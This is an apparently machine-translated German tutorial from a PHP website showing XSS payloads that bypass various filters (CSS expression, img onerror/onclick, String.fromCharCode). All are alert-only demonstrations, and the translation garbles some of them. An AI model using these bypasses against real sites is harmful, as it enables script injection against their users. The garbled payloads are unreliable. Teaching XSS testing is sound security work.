Wie wird der kleine Test von xss durchgeführt?

• Keine Sicherheitseinschränkungen, direkt verwenden

<script>alert(/xss/);</ script>

• Einschränkungen: Es kann nur CSS verwendet werden, HTML-Tags sind nicht erlaubt

Das wissen wir mit Expression kann zum Erstellen von XSS verwendet werden, kann jedoch nur unter IE getestet werden. Führen Sie daher bitte den folgenden Test in IE6 durch.

body {
black;
xss:alert(/xss/));/*IE6下测试*/
}

• Einschränkungen: HTML ist maskiert und das Image-Tag ist verfügbar .

Die im Test eingegebenen Zeichen werden in die Quelladresse eingefügt, sodass Sie sie mit einem Pseudoprotokoll umgehen können.

Geben Sie

alert( /xss/);

direkt ein. Oder Sie können Ereignisse zum Umgehen verwenden. Achten Sie einfach auf die Schlusserklärung wie folgt:

1" onerror= warning (/xss/); var a="1

• Einschränkung: Es wird eine Schlüsselwortfilterung verwendet.

Ich habe es getestet, das meiste davon ist gefiltert, einige sind nicht gefiltert, nach dem Testen wurde Skript/Onerror gefiltert, aber onclick wurde nicht gefiltert, verwenden Sie das onclick-Ereignis, um es zu umgehen

<img src=# onclick=alert(/xss/);>

• Einschränkungen: Verwenden Sie Schrägstriche, um die charakteristischen Zeichen zu maskieren.

Das heißt, unsere charakteristischen Zeichen B. einfache und doppelte Anführungszeichen, dürfen in XSS-Anweisungen nicht vorkommen.

Verwenden Sie

<script>alert(/xss/);</script>

direkt, um

zu umgehen, oder verwenden Sie die String.fromCharCode-Methode wie folgt:

<script>eval(String.fromCharCode(97,108,101,114,116,40,47,120,47,41,59));</script>

Das obige ist der detaillierte Inhalt vonWie wird der kleine Test von xss durchgeführt?. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!